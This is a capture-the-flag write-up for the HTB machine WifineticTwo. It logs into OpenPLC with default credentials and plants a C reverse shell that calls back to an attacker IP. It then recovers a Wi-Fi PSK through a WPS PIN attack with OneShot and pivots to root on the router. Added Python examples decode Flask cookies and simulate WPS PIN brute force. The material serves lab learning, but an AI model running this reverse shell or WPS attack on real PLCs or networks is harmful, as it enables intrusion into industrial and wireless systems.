【season-4】HTB WifineticTwo writeup


user

nmap

PORT     STATE SERVICE    VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
8080/tcp open http-proxy Werkzeug/1.0.1 Python/2.7.18
| http-title: Site doesn't have a title (text/html; charset=utf-8).
|_Requested resource was http://10.10.11.7:8080/login
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 NOT FOUND
| content-type: text/html; charset=utf-8
| content-length: 232
| vary: Cookie
| set-cookie: session=eyJfcGVybWFuZW50Ijp0cnVlfQ.Zfelqw.Aq1NMe9Z_Z-hdlL2RcbM1DXlKGU; Expires=Mon, 18-Mar-2024 02:28:39 GMT; HttpOnly; Path=/
| server: Werkzeug/1.0.1 Python/2.7.18
| date: Mon, 18 Mar 2024 02:23:39 GMT
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
| <title>404 Not Found</title>
| <h1>Not Found</h1>
| <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
| GetRequest:
| HTTP/1.0 302 FOUND
| content-type: text/html; charset=utf-8
| content-length: 219
| location: http://0.0.0.0:8080/login
| vary: Cookie
| set-cookie: session=eyJfZnJlc2giOmZhbHNlLCJfcGVybWFuZW50Ijp0cnVlfQ.ZfelqA.nN6MbTZPfWh0GH_zwv0QNyj684U; Expires=Mon, 18-Mar-2024 02:28:36 GMT; HttpOnly; Path=/
| server: Werkzeug/1.0.1 Python/2.7.18
| date: Mon, 18 Mar 2024 02:23:36 GMT
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
| <title>Redirecting...</title>
| <h1>Redirecting...</h1>
| <p>You should be redirected automatically to target URL: <a href="/login">/login</a>. If not click the link.
| HTTPOptions:
| HTTP/1.0 200 OK
| content-type: text/html; charset=utf-8
| allow: HEAD, OPTIONS, GET
| vary: Cookie
| set-cookie: session=eyJfcGVybWFuZW50Ijp0cnVlfQ.ZfelqQ.HQmJQZxDo7-H-bGWAF5z9ShIk9c; Expires=Mon, 18-Mar-2024 02:28:37 GMT; HttpOnly; Path=/
| content-length: 0
| server: Werkzeug/1.0.1 Python/2.7.18
| date: Mon, 18 Mar 2024 02:23:37 GMT
| RTSPRequest:
| HTTP/1.1 400 Bad request
| content-length: 90
| cache-control: no-cache
| content-type: text/html
| connection: close
| <html><body><h1>400 Bad request</h1>
| Your browser sent an invalid request.
|_ </body></html>
|_http-server-header: Werkzeug/1.0.1 Python/2.7.18
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.94SVN%I=7%D=3/17%Time=65F7A5A7%P=x86_64-pc-linux-gnu%r
SF:(GetRequest,24C,"HTTP/1\.0\x20302\x20FOUND\r\ncontent-type:\x20text/htm
SF:l;\x20charset=utf-8\r\ncontent-length:\x20219\r\nlocation:\x20http://0\
SF:.0\.0\.0:8080/login\r\nvary:\x20Cookie\r\nset-cookie:\x20session=eyJfZn
SF:Jlc2giOmZhbHNlLCJfcGVybWFuZW50Ijp0cnVlfQ\.ZfelqA\.nN6MbTZPfWh0GH_zwv0QN
SF:yj684U;\x20Expires=Mon,\x2018-Mar-2024\x2002:28:36\x20GMT;\x20HttpOnly;
SF:\x20Path=/\r\nserver:\x20Werkzeug/1\.0\.1\x20Python/2\.7\.18\r\ndate:\x
SF:20Mon,\x2018\x20Mar\x202024\x2002:23:36\x20GMT\r\n\r\n<!DOCTYPE\x20HTML
SF:\x20PUBLIC\x20\"-//W3C//DTD\x20HTML\x203\.2\x20Final//EN\">\n<title>Red
SF:irecting\.\.\.</title>\n<h1>Redirecting\.\.\.</h1>\n<p>You\x20should\x2
SF:0be\x20redirected\x20automatically\x20to\x20target\x20URL:\x20<a\x20hre
SF:f=\"/login\">/login</a>\.\x20\x20If\x20not\x20click\x20the\x20link\.")%
SF:r(HTTPOptions,14E,"HTTP/1\.0\x20200\x20OK\r\ncontent-type:\x20text/html
SF:;\x20charset=utf-8\r\nallow:\x20HEAD,\x20OPTIONS,\x20GET\r\nvary:\x20Co
SF:okie\r\nset-cookie:\x20session=eyJfcGVybWFuZW50Ijp0cnVlfQ\.ZfelqQ\.HQmJ
SF:QZxDo7-H-bGWAF5z9ShIk9c;\x20Expires=Mon,\x2018-Mar-2024\x2002:28:37\x20
SF:GMT;\x20HttpOnly;\x20Path=/\r\ncontent-length:\x200\r\nserver:\x20Werkz
SF:eug/1\.0\.1\x20Python/2\.7\.18\r\ndate:\x20Mon,\x2018\x20Mar\x202024\x2
SF:002:23:37\x20GMT\r\n\r\n")%r(RTSPRequest,CF,"HTTP/1\.1\x20400\x20Bad\x2
SF:0request\r\ncontent-length:\x2090\r\ncache-control:\x20no-cache\r\ncont
SF:ent-type:\x20text/html\r\nconnection:\x20close\r\n\r\n<html><body><h1>4
SF:00\x20Bad\x20request</h1>\nYour\x20browser\x20sent\x20an\x20invalid\x20
SF:request\.\n</body></html>\n")%r(FourOhFourRequest,224,"HTTP/1\.0\x20404
SF:\x20NOT\x20FOUND\r\ncontent-type:\x20text/html;\x20charset=utf-8\r\ncon
SF:tent-length:\x20232\r\nvary:\x20Cookie\r\nset-cookie:\x20session=eyJfcG
SF:VybWFuZW50Ijp0cnVlfQ\.Zfelqw\.Aq1NMe9Z_Z-hdlL2RcbM1DXlKGU;\x20Expires=M
SF:on,\x2018-Mar-2024\x2002:28:39\x20GMT;\x20HttpOnly;\x20Path=/\r\nserver
SF::\x20Werkzeug/1\.0\.1\x20Python/2\.7\.18\r\ndate:\x20Mon,\x2018\x20Mar\
SF:x202024\x2002:23:39\x20GMT\r\n\r\n<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//W
SF:3C//DTD\x20HTML\x203\.2\x20Final//EN\">\n<title>404\x20Not\x20Found</ti
SF:tle>\n<h1>Not\x20Found</h1>\n<p>The\x20requested\x20URL\x20was\x20not\x
SF:20found\x20on\x20the\x20server\.\x20If\x20you\x20entered\x20the\x20URL\
SF:x20manually\x20please\x20check\x20your\x20spelling\x20and\x20try\x20aga
SF:in\.</p>\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 - 5.4 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 74.58 seconds
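The two set-cookie headers in the nmap output are Flask sessions: Werkzeug/1.0.1 plus a `session=<payload>.<timestamp>.<signature>` cookie handed out even to an unauthenticated 404. The payload and timestamp are only base64url-encoded, not encrypted, so they can be read without the app's SECRET_KEY. The script below is an added example, not part of the original writeup or of OpenPLC; it decodes the two cookies nmap captured and verifies nothing (the HMAC in the third segment is the only part that needs the key), so treat what it returns as untrusted data.

```python
"""Decode the Flask session cookies from the nmap output (added example)."""
import base64
import json
import zlib
from datetime import datetime, timezone
from typing import List

# Copied from the nmap fingerprint above: the 404 response and the 302 redirect.
COOKIE_404 = "eyJfcGVybWFuZW50Ijp0cnVlfQ.Zfelqw.Aq1NMe9Z_Z-hdlL2RcbM1DXlKGU"
COOKIE_302 = "eyJfZnJlc2giOmZhbHNlLCJfcGVybWFuZW50Ijp0cnVlfQ.ZfelqA.nN6MbTZPfWh0GH_zwv0QNyj684U"


def _b64url_decode(segment: str) -> bytes:
    # itsdangerous strips the '=' padding; put it back before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_flask_session(cookie: str) -> dict:
    """Split a Flask session cookie into payload, issue time and signature.

    Layout (itsdangerous URLSafeTimedSerializer): <payload>.<timestamp>.<sig>,
    with a leading '.' when the payload is zlib-compressed. Payload and
    timestamp are plain base64url; only the HMAC signature needs SECRET_KEY,
    and this function does NOT verify it, so the payload is untrusted input.
    """
    compressed = cookie.startswith(".")
    payload_b64, ts_b64, sig_b64 = cookie.lstrip(".").split(".")
    raw = _b64url_decode(payload_b64)
    if compressed:
        raw = zlib.decompress(raw)
    # The timestamp segment is the big-endian bytes of the issue time.
    timestamp = int.from_bytes(_b64url_decode(ts_b64), "big")
    issued = datetime.fromtimestamp(timestamp, tz=timezone.utc)
    return {
        "payload": json.loads(raw),
        "timestamp": timestamp,
        "issued": issued.strftime("%Y-%m-%d %H:%M:%S UTC"),
        "signature": sig_b64,
    }


def session_hints(payload: dict) -> List[str]:
    """Fingerprint hints a pentester reads off an unauthenticated session."""
    hints = []
    if "_fresh" in payload:
        hints.append("Flask-Login in use (_fresh is its session key)")
    if "_user_id" in payload or "user_id" in payload:
        hints.append("cookie carries a logged-in user id")
    if payload.get("_permanent"):
        hints.append("permanent session: cookie outlives the browser session")
    return hints


if __name__ == "__main__":
    for name, cookie in (("404", COOKIE_404), ("302", COOKIE_302)):
        s = decode_flask_session(cookie)
        print(name, s["issued"], s["payload"], session_hints(s["payload"]))
```

Both decoded issue times match the `date:` headers in the nmap output to the second (02:23:39 and 02:23:36), which is the cheap sanity check for the decode: older itsdangerous releases offset their timestamps from 2011-01-01 rather than the Unix epoch, so always cross-check against the server's Date header. The `Expires` value sits exactly five minutes after each issue time, so the app runs with a 300-second permanent-session lifetime, and `_fresh` in the redirect response's cookie points at Flask-Login handling the `/login` flow.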


Log in with the default credentials openplc/openplc.

The CVE you will find for this is CVE-2018-20818, but OpenPLC can compile C by design: the Hardware page lets an authenticated user edit the hardware-layer source that gets built into the runtime, so you can simply replace part of that code with a reverse shell.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
//-----------------------------------------------------------------------------
// DISCLAIMER: EDDITING THIS FILE CAN BREAK YOUR OPENPLC RUNTIME! IF YOU DON'T
// KNOW WHAT YOU'RE DOING, JUST DON'T DO IT. EDIT AT YOUR OWN RISK.
//
// PS: You can always restore original functionality if you broke something
// in here by clicking on the "Restore Original Code" button above.
//-----------------------------------------------------------------------------

//-----------------------------------------------------------------------------
// These are the ignored I/O vectors. If you want to override how OpenPLC
// handles a particular input or output, you must put them in the ignored
// vectors. For example, if you want to override %IX0.5, %IX0.6 and %IW3
// your vectors must be:
// int ignored_bool_inputs[] = {5, 6}; //%IX0.5 and %IX0.6 ignored
// int ignored_int_inputs[] = {3}; //%IW3 ignored
//
// Every I/O on the ignored vectors will be skipped by OpenPLC hardware layer
//-----------------------------------------------------------------------------
int ignored_bool_inputs[] = {-1};
int ignored_bool_outputs[] = {-1};
int ignored_int_inputs[] = {-1};
int ignored_int_outputs[] = {-1};

//-----------------------------------------------------------------------------
// This function is called by the main OpenPLC routine when it is initializing.
// Hardware initialization procedures for your custom layer should be here.
//
// The reverse shell lives here: connect back to the attacker, point
// stdin/stdout/stderr at the socket and execve /bin/bash. execve never
// returns on success, so the runtime process *becomes* the shell and the
// update hooks below are never reached; one copy of the payload is enough.
// These hooks are declared void, so they must not "return 0;".
//-----------------------------------------------------------------------------
void initCustomLayer()
{
    int sockt;
    int port = 10086;                       // attacker's listener port
    struct sockaddr_in revsockaddr;

    sockt = socket(AF_INET, SOCK_STREAM, 0);
    memset(&revsockaddr, 0, sizeof(revsockaddr));
    revsockaddr.sin_family = AF_INET;
    revsockaddr.sin_port = htons(port);
    revsockaddr.sin_addr.s_addr = inet_addr("10.10.x.x"); // attacker's VPN IP (placeholder kept from the original)

    if (connect(sockt, (struct sockaddr *) &revsockaddr, sizeof(revsockaddr)) < 0)
        return;                             // listener not up: leave the runtime alone

    dup2(sockt, 0);
    dup2(sockt, 1);
    dup2(sockt, 2);

    char * const argv[] = {"/bin/bash", NULL};
    execve("/bin/bash", argv, NULL);
}

//-----------------------------------------------------------------------------
// This function is called by OpenPLC in a loop. Here the internal input
// buffers must be updated with the values you want. Make sure to use the mutex
// bufferLock to protect access to the buffers on a threaded environment.
//-----------------------------------------------------------------------------
void updateCustomIn()
{
    // Nothing to do: the shell already replaced the process in initCustomLayer().
    // Example Code - Overwritting %IW3 with a fixed value
    // If you want to have %IW3 constantly reading a fixed value (for example, 53)
    // you must add %IW3 to the ignored vectors above, and then just insert this
    // single line of code in this function:
    // if (int_input[3] != NULL) *int_input[3] = 53;
}

//-----------------------------------------------------------------------------
// This function is called by OpenPLC in a loop. Here the internal output
// buffers must be updated with the values you want. Make sure to use the mutex
// bufferLock to protect access to the buffers on a threaded environment.
//-----------------------------------------------------------------------------
void updateCustomOut()
{
    // Nothing to do: see updateCustomIn().
}

Save, start the PLC, catch the connection on your listener, and that is the user flag.

root

Running ps here shows a wpa_supplicant process, which is a networking thing; I didn't pay much attention to it, so it got a low priority, mainly because I had never used it.

ip a shows a wlan0 interface; I assumed the lab environment just hadn't been cleaned up.

I poked around without finding anything, then looked back at the ip a output and the address looked off.

eth0's IP doesn't match the target's IP, so I suspected the box's external IP is NATed.

That means there is probably an internal network; arp -a shows a 10.x.x.1 that looks like a gateway.

I uploaded an nmap binary and scanned it.

Starting Nmap 7.80 ( https://nmap.org ) at 2024-03-19 05:25 UTC
Nmap scan report for 10.0.3.1
Host is up (0.000013s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
8080/tcp open http-proxy
MAC Address: 00:16:2E:00:00:00 (Xensource)

8080 and 53 on the gateway had nothing of interest.

Then I accidentally broke the shell, so I reset the machine.

While resetting I noticed the machine's icon is a router, and realised the intended path is Wi-Fi.

I'm not good at Wi-Fi attacks, so I followed this:
hacktricks-WPS

First install airmon-ng and airodump-ng: one puts the card into monitor mode, the other captures frames.

Installing them is a hassle; binaries dragged onto the box don't run because the .so versions differ, so a friend suggested using gost to proxy apt out through the shell, following configure-proxy-for-apt:

Add this line to your /etc/apt/apt.conf file (substitute your details for yourproxyaddress and proxyport).

Acquire::http::Proxy "http://yourproxyaddress:proxyport";

Of course there are other ways: compile the tools inside the box, or use different tools.

Once that is done, airmon-ng start wlan0 puts the card into monitor mode.

iwconfig now shows the interface renamed to wlan0mon.

airodump-ng wlan0mon lists the devices on the wireless network.

Barring surprises, at this point you pick up the other device's SSID (and its BSSID and channel).

Now try a WPS brute force, starting with bully. The command below is the HackTricks example verbatim; substitute your own monitor interface (wlan0mon here) and the BSSID/channel airodump-ng showed: bully wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -S -F -B -v 3

It just hangs.

So I switched to OneShot-C.

root@attica01:/root# ./oneshot -i wlan0mon -b 02:00:00:00:01:00 -K                                                                          
[*] Running wpa_supplicant...
[*] Trying pin 12345670...
[*] Scanning...
[*] Authenticating...
[+] Authenticated
[*] Associating with AP...
[+] Associated with 02:00:00:00:01:00 (ESSID: plcrouter)
[*] Received Identity Request
[*] Sending Identity Response...
[*] Received WPS Message M1
[P] E-Nonce: 4eed14d52d2b9e8705e7e73bfb6d0e38
[*] Building Message M2
[P] PKR: 6153ead28121131f32ddb1372cbc37ab58b405a1eb11d27fee470d0bcf00d964cf60c870af1f65ce4250744a263d939c81821a260ff80c5c83ed99182943cee6040e7cb7884a10bcea4a9a87ea732b46bb7f7b5b52423de24b1a2ba36ee3210bf210cc862ce121d1bb75906efa4bcb765fc7e7036f8a7a1938531561e609fca2dab7bed1085a8d29757fb4aed1696c8238b915bb3b07dfc2a26d0dcecdf1b8fb58b155789e33419e30353c405e69aa887bdf511ffd93fe383510e4595dbc79b6
[P] PKE: 3e9b570cf842004164003d3c1d419a8c2666938dc2885ff5473bc844c20114e8a6cfd5df1fad26005d00a7788a8ea1db43bbb7eae67c7e56b9a0ef7b2f67403330a653e620ef0c3c36ab8ddc7e8e82669060cc5a60cbd6938ebdba4d5a3278dffe800af76427cbb089b8a91859112be071d03d3ba5446bba65a9e640e3e3d26afdd41dfe2ae9380aaccee7e81a2776075b675c36dba0b4d8f01490f17d4f9b8c1f4e8688430aa79d0efd9ab29b2f3b3bc45177f20815906a2b65cf74556fbc70
[P] Authkey: 6275cd3d4d715cfd92dcfe3d1bf047d7424aef92b75906e3d9adad0cb3330bd1
[*] Received WPS Message M3
[P] E-Hash1: 836aa7979fc94a22bf35208238ad218657957d1544273a222c7e4f5dd0febedb
[P] E-Hash2: ef24d67f056c8493c9eb5fea843d883c974bd635deaab3f03276903b9f14dcba
[*] Building Message M4
[*] Received WPS Message M5
[*] Building Message M6
[*] Received WPS Message M7
[+] WPS PIN: 12345670
[+] WPA PSK: NoWWEDoKnowWhaTisReal123!
[+] AP SSID: plcrouter
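Two things in the OneShot run above are worth reading carefully. First, `-K` asks for the pixie-dust attack, which is why it prints E-Nonce, PKE, PKR, the Authkey and E-Hash1/E-Hash2 (the values pixiewps would consume); but the AP answered the very first PIN, 12345670, with M5 and then M7, and M7 is the message that carries the credential, so the PSK came out without any offline step. Second, that PIN is the well-known WPS default: 1234567 plus its checksum digit 0. The script below is an added example, not part of the original writeup or of OneShot/bully; it implements the WPS PIN checksum and simulates the split brute force that bully performs, using a toy AP object of my own construction in place of the real M4/M6 hash checks, to show why even a non-default PIN only buys about 11,000 attempts.

```python
"""WPS PIN arithmetic behind the bully / OneShot attempts above (added example)."""
from typing import List, Optional


def wps_checksum(first_seven: int) -> int:
    """Checksum digit that the WPS spec appends to a 7-digit PIN prefix.

    Digits at odd positions (1st, 3rd, 5th, 7th from the left) weigh 3,
    the others weigh 1; the checksum makes the weighted sum a multiple of 10.
    """
    accum = 0
    shifted = first_seven * 10          # make room for the checksum digit
    for pos in range(7, 0, -1):         # pos 7 is the leftmost digit
        digit = (shifted // 10 ** pos) % 10
        accum += 3 * digit if pos % 2 == 1 else digit
    return (10 - accum % 10) % 10


def is_valid_wps_pin(pin: str) -> bool:
    """True if pin is 8 digits and its last digit is the correct checksum."""
    return len(pin) == 8 and pin.isdigit() and wps_checksum(int(pin[:7])) == int(pin[7])


def first_half_candidates() -> List[str]:
    """All 10^4 values for PIN digits 1-4 (checked by the AP's reply to M4)."""
    return [f"{i:04d}" for i in range(10_000)]


def second_half_candidates(first_half: str) -> List[str]:
    """The 10^3 values for digits 5-8 once the first half is known.

    Only digits 5-7 are free: digit 8 is the checksum, so it is derived
    rather than guessed. The AP's reply to M6 checks this half.
    """
    out = []
    for j in range(1_000):
        tail = f"{j:03d}"
        out.append(tail + str(wps_checksum(int(first_half + tail))))
    return out


class SimulatedAP:
    """Toy enrollee standing in for the real AP (constructed for this example).

    A real AP verifies R-Hash1 (in M4) and R-Hash2 (in M6), HMACs over each
    PIN half, and answers a wrong half with a NACK instead of M5 / M7.
    Comparing the digits directly gives the attacker exactly the same
    yes/no oracle, which is all the split brute force relies on.
    """

    def __init__(self, pin: str) -> None:
        if not is_valid_wps_pin(pin):
            raise ValueError("not a valid WPS PIN")
        self._pin = pin
        self.attempts = 0               # one WPS exchange per attempt

    def m4_accepts(self, first_half: str) -> bool:
        self.attempts += 1
        return first_half == self._pin[:4]

    def m6_accepts(self, first_half: str, second_half: str) -> bool:
        self.attempts += 1
        return first_half + second_half == self._pin


def recover_pin(ap: SimulatedAP) -> Optional[str]:
    """Split brute force: find digits 1-4 via M4, then digits 5-8 via M6."""
    first = next((h for h in first_half_candidates() if ap.m4_accepts(h)), None)
    if first is None:
        return None
    for second in second_half_candidates(first):
        if ap.m6_accepts(first, second):
            return first + second
    return None


if __name__ == "__main__":
    # The PIN OneShot tried first, and which plcrouter accepted outright.
    print("12345670 valid:", is_valid_wps_pin("12345670"))
    ap = SimulatedAP("99999995")        # worst case for this enumeration order
    print("recovered", recover_pin(ap), "after", ap.attempts, "attempts")
```

The worst case is 10,000 + 1,000 exchanges, which is why WPS PIN registration is brute-forceable at all and why tools like bully walk the halves separately; the real-world limit is the AP's lock-out and rate limiting, not the key space. The lesson for the plcrouter side is simply that WPS external-registrar PINs should be disabled, and never left at 12345670.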

https://wiki.somlabs.com/index.php/Connecting_to_WiFi_network_using_systemd_and_wpa-supplicant

Follow that page to bring up the Wi-Fi interface; if DHCP isn't set up, remember to assign an IP manually. Note the PSK has to be copied exactly as OneShot recovered it (the case of every letter matters).

ctrl_interface=/var/run/wpa_supplicant
ctrl_interface_group=0
update_config=1

network={
    ssid="plcrouter"
    psk="NoWWEDoKnowWhaTisReal123!"
    key_mgmt=WPA-PSK
    proto=WPA2
    pairwise=CCMP TKIP
    group=CCMP TKIP
    scan_ssid=1
}

To use DHCP instead, do as the doc says and create the systemd-networkd unit:
vim /etc/systemd/network/25-wlan.network

[Match]
Name=wlan0

[Network]
DHCP=ipv4

Restart the wpa_supplicant instance for wlan0:
systemctl restart wpa_supplicant@wlan0.service

ifconfig now shows the interface up with an address.

Check the routing table:
route

SSH to the gateway 192.168.1.1 and you have root.